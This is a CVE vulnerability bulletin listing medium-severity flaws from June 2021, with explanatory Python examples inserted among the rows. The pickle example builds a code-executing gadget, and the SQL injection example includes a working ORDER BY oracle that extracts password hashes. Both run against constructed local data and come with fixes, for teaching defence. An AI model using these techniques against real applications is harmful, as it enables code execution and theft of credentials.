google — android In iaxxx_calc_i2s_div of iaxxx-codec.c, there is a possible hardware port write with user controlled data due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-180950209 2021-06-22 4.6 CVE-2021-0607
MISC
google — android In drm_syncobj_handle_to_fd of drm_syncobj.c, there is a possible use after free due to incorrect refcounting. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168034487 2021-06-22 4.6 CVE-2021-0606
MISC
google — android In ActivityTaskManagerService.startActivity() and AppTaskImpl.startActivity() of ActivityTaskManagerService.java and AppTaskImpl.java, there is possible access to restricted activities due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137395936 2021-06-22 4.6 CVE-2021-0571
MISC
google — android In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622 2021-06-21 4.6 CVE-2021-0510
MISC
google — android In onReceive of DevicePolicyManagerService.java, there is a possible enabling of disabled profiles due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170121238 2021-06-22 4.6 CVE-2021-0568
MISC
google — android In isRestricted of RemoteViews.java, there is a possible way to inject font files due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179461812 2021-06-22 4.6 CVE-2021-0567
MISC
google — android In onLoadFailed of AnnotateActivity.java, there is a possible way to gain WRITE_EXTERNAL_STORAGE permissions without user consent due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179688673 2021-06-22 4.6 CVE-2021-0550
MISC
google — android In rw_i93_send_to_lower of rw_i93.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-157650357 2021-06-22 4.6 CVE-2021-0548
MISC
google — android In onReceive of NetInitiatedActivity.java, there is a possible way to supply an attacker-controlled value to a GPS HAL handler due to a missing permission check. This could lead to local escalation of privilege that may result in undefined behavior in some HAL implementations with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174151048 2021-06-22 4.6 CVE-2021-0547
MISC
google — android In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258733 2021-06-22 4.6 CVE-2021-0546
MISC
google — android In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154 2021-06-21 6.9 CVE-2021-0508
MISC
greenbone — greenbone_security_assistant Greenbone Security Assistant (GSA) before 8.0.2 and Greenbone OS (GOS) before 5.0.10 allow XSS during 404 URL handling in gsad. 2021-06-21 4.3 CVE-2019-25047
MISC
MISC
MISC
hisiphp — hisiphp Cross Site Scripting (XSS) vulnerability in HisiPHP 2.0.8 via the group name in addgroup.html. 2021-06-21 4.3 CVE-2020-21130
MISC
icehrm — icehrm A cross site request forgery (CSRF) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to create new admin accounts or change users’ passwords. 2021-06-22 6.8 CVE-2021-34244
MISC
icehrm — icehrm A session fixation vulnerability was discovered in Ice Hrm 29.0.0 OS which allows an attacker to hijack a valid user session via a crafted session cookie. 2021-06-22 5.8 CVE-2021-35046
MISC
icehrm — icehrm Cross site scripting (XSS) vulnerability in Ice Hrm 29.0.0.OS, allows attackers to execute arbitrary code via the parameters to the /app/ endpoint. 2021-06-22 4.3 CVE-2021-35045
MISC
increments — qiita_markdown Increments Qiita::Markdown before 0.34.0 allows XSS via a crafted gist link, a different vulnerability than CVE-2021-28796. 2021-06-21 4.3 CVE-2021-28833
MISC
MISC
is-svg_project — is-svg A vulnerability was discovered in IS-SVG version 4.3.1 and below where a Regular Expression Denial of Service (ReDOS) occurs if the application is provided and checks a crafted invalid SVG string. 2021-06-21 5 CVE-2021-29059
MISC
MISC
MISC
MISC
joomla — joomla! Joomla! Core is prone to a session fixation vulnerability. An attacker may leverage this issue to hijack an arbitrary session and gain access to sensitive information, which may help in launching further attacks. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 5 CVE-2010-1434
MISC
MISC
joomla — joomla! Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may help in launching further attacks. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 5 CVE-2010-1432
MISC
MISC
juqingcms — juqingcms Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component “JuQingCMS_v1.0/admin/index.php?c=administrator&a=add”. 2021-06-22 6.8 CVE-2020-18648
MISC
mcusystem — mcusystem The login page in the MCUsystem does not filter special characters, which allows unauthenticated remote attackers to inject JavaScript and thus perform reflected XSS attacks. 2021-06-18 4.3 CVE-2021-32536
MISC
metinfo — metinfo Cross Site Scripting (XSS) vulnerability in MetInfo 7.0.0 via the gourl parameter in login.php. 2021-06-21 4.3 CVE-2020-21517
MISC
MISC
MISC
moxa — mgate_mb3180_firmware An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which keeps the server waiting for the rest of each request until its resources are exhausted, leaving the web server in a denial-of-service condition. 2021-06-18 5 CVE-2021-33824
MISC
MISC
MISC
moxa — mgate_mb3180_firmware An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. An attacker could send a large volume of TCP SYN packets to exhaust the web service's resources, leaving the web server in a denial-of-service condition. 2021-06-18 5 CVE-2021-33823
MISC
MISC
mozilla — firefox Firefox for Android would become unstable and hard-to-recover when a website opened too many popups. *This bug only affects Firefox for Android. Other operating systems are unaffected.* This vulnerability affects Firefox < 89. 2021-06-24 4.3 CVE-2021-29962
MISC
MISC
mozilla — firefox When drawing text onto a canvas with WebRender disabled, an out of bounds read could occur. *This bug only affects Firefox on Windows. Other operating systems are unaffected.* This vulnerability affects Firefox < 89.0.1. 2021-06-24 5.8 CVE-2021-29968
MISC
MISC
mozilla — firefox Mozilla developers reported memory safety bugs present in Firefox 88. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 89. 2021-06-24 6.8 CVE-2021-29966
MISC
MISC
mozilla — firefox When Web Render components were destructed, a race condition could have caused undefined behavior, and we presume that with enough effort may have been exploitable to run arbitrary code. This vulnerability affects Firefox < 88.0.1 and Firefox for Android < 88.1.3. 2021-06-24 5.1 CVE-2021-29952
MISC
MISC
mozilla — firefox Mozilla developers and community members reported memory safety bugs present in Firefox 87. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 88. 2021-06-24 6.8 CVE-2021-29947
MISC
MISC
mozilla — firefox Ports that were written as an integer overflow above the bounds of a 16-bit integer could have bypassed port blocking restrictions when used in the Alt-Svc header. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 6.8 CVE-2021-29946
MISC
MISC
MISC
MISC
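The Alt-Svc entry above describes a recurring bug shape: a value is validated as a wide integer and only afterwards narrowed to 16 bits, so a port such as 65558 passes the block-list check and then becomes 22 on the wire. The following is an added illustration of that shape and its fix; it is not Mozilla's code, and the Alt-Svc grammar, the blocked-port set and the function names are assumptions made for the demonstration.

```python
# Added example (not Mozilla code): "check the wide integer, then narrow it"
# versus "range-check first". The Alt-Svc parsing and the blocked-port set
# below are assumptions for the demo, not Firefox's actual implementation.
import re
from typing import Callable, Optional, Tuple

# Assumption: a small subset of the ports a browser refuses to connect to.
BLOCKED_PORTS = {21, 22, 23, 25, 110, 143, 6667}

# Assumption: a minimal Alt-Svc value of the form  proto="host:port"
ALT_SVC_RE = re.compile(r'^\s*(?P<proto>[\w-]+)="(?P<host>[^":]*):(?P<port>\d+)"')


def parse_alt_svc(header: str) -> Tuple[str, str, str]:
    """Return (proto, host, port_text) from a single Alt-Svc value."""
    m = ALT_SVC_RE.match(header)
    if not m:
        raise ValueError("unparseable Alt-Svc header")
    return m.group("proto"), m.group("host"), m.group("port")


def resolve_port_flawed(port_text: str) -> Optional[int]:
    """Flawed order: block-list check on the full integer, then narrow to 16 bits."""
    port = int(port_text)
    if port in BLOCKED_PORTS:
        return None          # 65558 is not in the set, so it passes...
    return port & 0xFFFF     # ...and is narrowed to 22 here (65558 - 65536)


def resolve_port_fixed(port_text: str) -> Optional[int]:
    """Fixed order: reject anything outside 1..65535 before any other use."""
    port = int(port_text)
    if not 1 <= port <= 65535:
        return None
    if port in BLOCKED_PORTS:
        return None
    return port


def alt_svc_target(header: str,
                   resolver: Callable[[str], Optional[int]]) -> Optional[Tuple[str, int]]:
    """Apply a resolver to the port carried in an Alt-Svc value."""
    _proto, host, port_text = parse_alt_svc(header)
    port = resolver(port_text)
    return None if port is None else (host, port)


if __name__ == "__main__":
    hdr = 'h2="alt.example:65558"'   # 65558 = 65536 + 22
    print(alt_svc_target(hdr, resolve_port_flawed))  # ('alt.example', 22)
    print(alt_svc_target(hdr, resolve_port_fixed))   # None
```

The same check-then-truncate ordering shows up wherever a parsed number is stored into a narrower field (ports, lengths, array indices); the fix is always to validate against the narrow type's range before the value is used for anything.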
mozilla — firefox When a download was initiated, the client did not check whether it was in normal or private browsing mode, which led to private mode cookies being shared in normal browsing mode. This vulnerability affects Firefox for iOS < 34. 2021-06-24 4.3 CVE-2021-29958
MISC
MISC
mozilla — firefox Mozilla developers reported memory safety bugs present in Firefox 88 and Firefox ESR 78.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.11, Firefox < 89, and Firefox ESR < 78.11. 2021-06-24 6.8 CVE-2021-29967
MISC
MISC
MISC
MISC
mozilla — thunderbird Thunderbird unprotects a secret OpenPGP key prior to using it for a decryption, signing or key import task. If the task runs into a failure, the secret key may remain in memory in its unprotected state. This vulnerability affects Thunderbird < 78.8.1. 2021-06-24 5 CVE-2021-29950
MISC
MISC
mpmath — mpmath A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called. 2021-06-21 5 CVE-2021-29063
MISC
MISC
MISC
MISC
nvidia — jetson_linux Bootloader contains a vulnerability in NVIDIA MB2 where a potential heap overflow might allow an attacker to control all the RAM after the heap block, leading to denial of service or code execution. 2021-06-21 4.6 CVE-2021-34388
CONFIRM
openbsd — openbsd It was found in FreeBSD 8.0, 6.3 and 4.9, and OpenBSD 4.6 that a null pointer dereference in ftpd/popen.c may lead to remote denial of service of the ftpd service. 2021-06-22 5 CVE-2010-4816
MISC
MISC
MISC
owasp — enterprise_security_api_for_java It was found that all OWASP ESAPI for Java up to version 2.0 RC2 are vulnerable to padding oracle attacks. 2021-06-22 4.3 CVE-2010-3300
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmscheck_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22164
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsforgot-password.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22166
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsuser-login.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22165
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsedit-profile.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22173
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsadminbetweendates-detailsreports.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22175
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsbook-appointment.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22174
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a sensitive information disclosure vulnerability in multiple areas. Remote unauthenticated users can exploit the vulnerability to obtain user sensitive information. 2021-06-22 5 CVE-2020-22176
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsget_doctor.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22172
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsregistration.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22171
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsappointment-history.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22169
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmschange-emaild.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22168
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsget_doctor.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22170
MISC
phpipam — phpipam phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator. 2021-06-23 4.3 CVE-2021-35438
MISC
powerarchiver — powerarchiver The XML parser used in ConeXware PowerArchiver before 20.10.02 allows processing of external entities, which might lead to exfiltration of local files over the network (via an XXE attack). 2021-06-21 4.3 CVE-2021-28684
MISC
MISC
prototypejs — prototype An issue was discovered in the stripTags and unescapeHTML components in Prototype 1.7.3 version 1.6 and below where an attacker can cause a Regular Expression Denial of Service (ReDOS) through stripping crafted HTML tags. 2021-06-21 5 CVE-2020-27511
MISC
MISC
MISC
riot-os — riot RIOT-OS 2021.01 before commit 85da504d2dc30188b89f44c3276fc5a25b31251f contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31660
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 609c9ada34da5546cffb632a98b7ba157c112658 contains a buffer overflow that could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31661
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 07f1254d8537497552e7dce80364aaead9266bbe contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31662
CONFIRM
MISC
riot-os — riot RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31663
MISC
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 44741ff99f7a71df45420635b238b9c22093647a contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31664
MISC
CONFIRM
serenityos — serenityos SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-33185
CONFIRM
serenityos — serenityos SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-33186
CONFIRM
sing4g — 4gee_router_hh70vb_firmware An issue was discovered on 4GEE ROUTER HH70VB Version HH70_E1_02.00_22. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which keeps the server waiting for the rest of each request until its resources are exhausted, leaving the web server in a denial-of-service condition. 2021-06-18 5 CVE-2021-33822
MISC
MISC
MISC
sonatype — nexus_repository_manager Sonatype Nexus Repository Manager 3.x before 3.31.0 allows a remote authenticated attacker to get a list of blob files and read the content of a blob file (via a GET request) without having been granted access. 2021-06-18 4 CVE-2021-34553
CONFIRM
striptags_project — striptags The npm package “striptags” is an implementation of PHP’s strip_tags in Typescript. In striptags before version 3.2.0, a type-confusion vulnerability can cause `striptags` to concatenate unsanitized strings when an array-like object is passed in as the `html` parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS. 2021-06-18 5 CVE-2021-32696
MISC
MISC
CONFIRM
MISC
synology — calendar Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-18 5 CVE-2021-34812
CONFIRM
synology — download_station Server-Side Request Forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to access intranet resources via unspecified vectors. 2021-06-18 4 CVE-2021-34811
CONFIRM
synology — download_station Improper privilege management vulnerability in cgi component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 6.5 CVE-2021-34810
CONFIRM
synology — download_station Improper neutralization of special elements used in a command (‘Command Injection’) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 6.5 CVE-2021-34809
CONFIRM
synology — media_server Server-Side Request Forgery (SSRF) vulnerability in cgi component in Synology Media Server before 1.8.3-2881 allows remote attackers to access intranet resources via unspecified vectors. 2021-06-18 5 CVE-2021-34808
CONFIRM
theologeek — manuskript ** DISPUTED ** Manuskript through 0.12.0 allows remote attackers to execute arbitrary code via a crafted settings.pickle file in a project file, because there is insecure deserialization via the pickle.load() function in settings.py. NOTE: the vendor’s position is that the product is not intended for opening an untrusted project file. 2021-06-21 6.8 CVE-2021-35196
MISC
MISC
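The Manuskript entry reduces to one fact worth seeing in code: a pickle stream is a program for the unpickler, so pickle.load() on bytes an attacker chose runs a callable the attacker chose. The block below is an added demonstration, not Manuskript's code; the Gadget class, the settings dict and the allow-list of safe globals are constructed for the example.

```python
# Added example, not Manuskript code: why pickle.load() on a project-supplied
# settings file is code execution, and a restricted loader that refuses it.
# The Gadget class, settings contents and allow-list are constructed here.
import builtins
import io
import pickle


class Gadget:
    """Constructed object whose pickled form calls builtins.eval on load."""

    def __init__(self, expr: str):
        self.expr = expr

    def __reduce__(self):
        # pickle records "call builtins.eval with (expr,)" and replays it
        # in the loading process; any importable callable would do.
        return (builtins.eval, (self.expr,))


def build_malicious_settings(expr: str = "__import__('os').getpid()") -> bytes:
    """Constructed stand-in for an attacker-supplied settings.pickle."""
    return pickle.dumps({"theme": "dark", "payload": Gadget(expr)})


def build_benign_settings() -> bytes:
    """Constructed stand-in for a legitimate settings.pickle."""
    return pickle.dumps({"theme": "dark", "autosave": True})


def load_settings_unsafe(data: bytes):
    """The pattern the advisory describes: pickle.load on untrusted bytes."""
    return pickle.load(io.BytesIO(data))


# Assumption: plain containers and scalars are the only globals a settings
# file legitimately needs; everything else is refused.
SAFE_GLOBALS = {("builtins", n) for n in (
    "dict", "list", "tuple", "set", "frozenset",
    "str", "int", "float", "bool", "bytes")}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse any global reference outside the allow-list."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def load_settings_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True if the restricted loader refused the stream."""
    try:
        load_settings_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    evil = build_malicious_settings("40 + 2")
    print(load_settings_unsafe(evil)["payload"])      # 42: eval ran on load
    print(rejects(evil), rejects(build_benign_settings()))  # True False
```

A restricted unpickler is the narrow mitigation when the format cannot change; it still parses attacker-controlled structure, so for settings data a format with no code-loading semantics (JSON, TOML) is the better fix. The vendor's position that project files are trusted input does not change the behaviour shown here; it only changes who is expected to be on the other side of the file.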
tielabs — jannah The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. 2021-06-21 4.3 CVE-2021-24364
CONFIRM
typesettercms — typesetter Cross Site Scripting vulnerability in Typesetter 5.1 via the (1) className and (2) Description fields in index.php/Admin/Classes. 2021-06-21 4.3 CVE-2020-19511
MISC
MISC
ui — camera_g3_flex_firmware An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. An attacker could send a large volume of TCP SYN packets to exhaust the web service's resources, leaving the web server in a denial-of-service condition. 2021-06-18 5 CVE-2021-33820
MISC
MISC
MISC
ui — camera_g3_flex_firmware An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. Attackers can use the slowhttptest tool to send incomplete HTTP requests, which keeps the server waiting for the rest of each request until its resources are exhausted, leaving the web server in a denial-of-service condition. 2021-06-18 5 CVE-2021-33818
MISC
MISC
MISC
vanillaforums — vanilla_forums A cross-site scripting vulnerability was found in Vanilla Forums before 2.0.10, where a filename could contain arbitrary code that is executed on the client side. 2021-06-22 4.3 CVE-2010-4264
MISC
MISC
vanillaforums — vanilla_forums A potential linkbait vulnerability was found in the dispatcher of Vanilla Forums before 2.0.10. 2021-06-22 5.8 CVE-2010-4266
MISC
vfsjfilechooser2_project — vfsjfilechooser2 A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Vfsjfilechooser2 version 0.2.9 and below which occurs when the application attempts to validate crafted URIs. 2021-06-21 5 CVE-2021-29061
MISC
MISC
MISC
MISC
MISC
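Four entries in this table (is-svg, mpmath, Prototype, vfsjfilechooser2) are regular-expression denial of service, so one added example covers them all. It is not code from any of those projects: the patterns, the size cap and the attack string are constructed to show the shape of the bug (a quantifier nested inside another quantifier over the same characters) and the two fixes that apply regardless of library (cap the input length before matching, and rewrite the pattern so the engine has only one way to consume each character).

```python
# Added example covering the ReDoS entries above (is-svg, mpmath, Prototype,
# vfsjfilechooser2); not code from any of those projects. Patterns, size cap
# and attack string are constructed for the demonstration.
import re
import time

MAX_INPUT = 64 * 1024   # assumption: a sane upper bound for a string we will scan

# Nested quantifier: (?:\s*)* lets a backtracking engine split a run of
# whitespace between the inner and outer loop in every possible way before
# giving up, so a long run of spaces NOT followed by "<svg" costs time that
# doubles with every extra space.
VULNERABLE_SVG = re.compile(r"^(?:\s*)*<svg")

# Same language, unambiguous: one loop over whitespace, then the literal.
SAFE_SVG = re.compile(r"^\s*<svg")


def is_svg_vulnerable(s: str) -> bool:
    """Matches correctly, but with exponential worst-case cost."""
    return VULNERABLE_SVG.match(s) is not None


def is_svg_hardened(s: str) -> bool:
    """Same answer on legitimate input, linear cost on hostile input."""
    # Fix 1: refuse oversized input before the regex engine sees it.
    if len(s) > MAX_INPUT:
        return False
    # Fix 2: use the unambiguous pattern.
    return SAFE_SVG.match(s) is not None


def attack_string(n: int) -> str:
    """Constructed worst case: n spaces, then a byte that defeats the match."""
    return " " * n + "x"


def seconds_to_match(pattern, s: str) -> float:
    """Wall-clock cost of one match attempt."""
    start = time.perf_counter()
    pattern.match(s)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Watch the vulnerable column roughly double per step while the safe one stays flat.
    for n in (8, 12, 16, 20):
        print(n,
              round(seconds_to_match(VULNERABLE_SVG, attack_string(n)), 4),
              round(seconds_to_match(SAFE_SVG, attack_string(n)), 6))
```

When reviewing a pattern, look for a group that can match an empty string or a variable-length run, itself repeated: `(\s*)*`, `(a+)+`, `(.*?)*`. Python's re has no match timeout, so the input-length cap is the only defence that holds even when the pattern rewrite is missed.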
vmware — tools VMware Tools for Windows (11.x.y prior to 11.3.0) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest operating system, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest operating system. 2021-06-18 4.9 CVE-2021-21997
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log_edit.php files failing to filter the csa_to_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20469
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php; remote attackers can exploit the vulnerability to create a task. 2021-06-21 6.4 CVE-2020-20467
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 is vulnerable to CSRF. Attackers can use the user_edit_password.php file to modify the user password. 2021-06-21 4.3 CVE-2020-20468
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has web site physical path leakage vulnerability. 2021-06-21 5 CVE-2020-20470
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a sensitive information disclosure vulnerability. The if_get_addbook.php file does not have an authentication operation. Remote attackers can obtain username information for all users of the current site. 2021-06-21 5 CVE-2020-20472
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default_task_edituser.php files failing to filter the csa_to_user parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20474
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control_task.php, control_project.php, default_user.php files failing to filter the sort parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20473
MISC
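The WSS entry above (and the PHPGurukul rows earlier in the table) describe SQL injection through parameters that were never filtered. The sort parameter case is worth a worked example because it cannot be fixed with bound parameters alone: a column name in ORDER BY is an identifier, not a value, so the fix is an allow-list. The block below is an added demonstration in Python against an in-memory SQLite database, not WSS code; the table, its rows and the function names are constructed, and it goes one step beyond the row by showing how an ORDER BY oracle extracts data rather than only proving the injection exists.

```python
# Added example, not White Shark System code: how an unfiltered "sort"
# parameter is exploited through ORDER BY, and the allow-list fix.
# The users table, its rows and all function names are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', 'a1b2c3');
        INSERT INTO users VALUES (2, 'bob',   'd4e5f6');
        INSERT INTO users VALUES (3, 'carol', '778899');
    """)
    return conn


def list_users_vulnerable(conn: sqlite3.Connection, sort: str):
    """The bug: the caller's sort parameter is interpolated into ORDER BY."""
    rows = conn.execute(f"SELECT name FROM users ORDER BY {sort}").fetchall()
    return [r[0] for r in rows]


# Assumption: the only orderings the page is supposed to offer.
ALLOWED_SORT = {"id": "id", "name": "name"}


def list_users_fixed(conn: sqlite3.Connection, sort: str, direction: str = "ASC"):
    """ORDER BY cannot take a bound parameter; map input onto fixed identifiers."""
    column = ALLOWED_SORT.get(sort)
    if column is None or direction not in ("ASC", "DESC"):
        raise ValueError("invalid sort")
    rows = conn.execute(f"SELECT name FROM users ORDER BY {column} {direction}").fetchall()
    return [r[0] for r in rows]


def fixed_rejects(conn: sqlite3.Connection, sort: str) -> bool:
    """True if the hardened function refuses the sort value."""
    try:
        list_users_fixed(conn, sort)
    except ValueError:
        return True
    return False


def oracle_payload(condition_sql: str) -> str:
    """Boolean-based extraction: row order reveals whether the condition holds."""
    return f"(CASE WHEN ({condition_sql}) THEN id ELSE -id END)"


def leak_hash_char(conn: sqlite3.Connection, user: str, pos: int) -> str:
    """Recover one hex character of a user's password hash via the oracle."""
    for ch in "0123456789abcdef":
        cond = (f"(SELECT substr(password_hash,{pos},1) FROM users "
                f"WHERE name='{user}')='{ch}'")
        order = list_users_vulnerable(conn, oracle_payload(cond))
        if order[0] == "alice":   # ascending id order only when the condition is true
            return ch
    raise RuntimeError("no candidate matched")


def leak_hash(conn: sqlite3.Connection, user: str, length: int) -> str:
    """Extract a whole hash one character at a time."""
    return "".join(leak_hash_char(conn, user, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print(list_users_vulnerable(db, "name"))     # the intended use
    print(leak_hash(db, "bob", 6))               # 'd4e5f6' without ever selecting it
    print(fixed_rejects(db, oracle_payload("1=1")))  # True
```

The same split applies in the PHP applications listed here: values (a user id, a date range, an e-mail address) go through prepared-statement placeholders, while identifiers (column names, sort direction, table names) are chosen from a fixed map and never copied from the request.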
wuzhicms — wuzhicms Cross Site Scripting (XSS) in Wuzhi CMS v4.1.0 allows remote attackers to execute arbitrary code via the “Title” parameter in the component “/coreframe/app/guestbook/myissue.php”. 2021-06-22 4.3 CVE-2020-18654
MISC
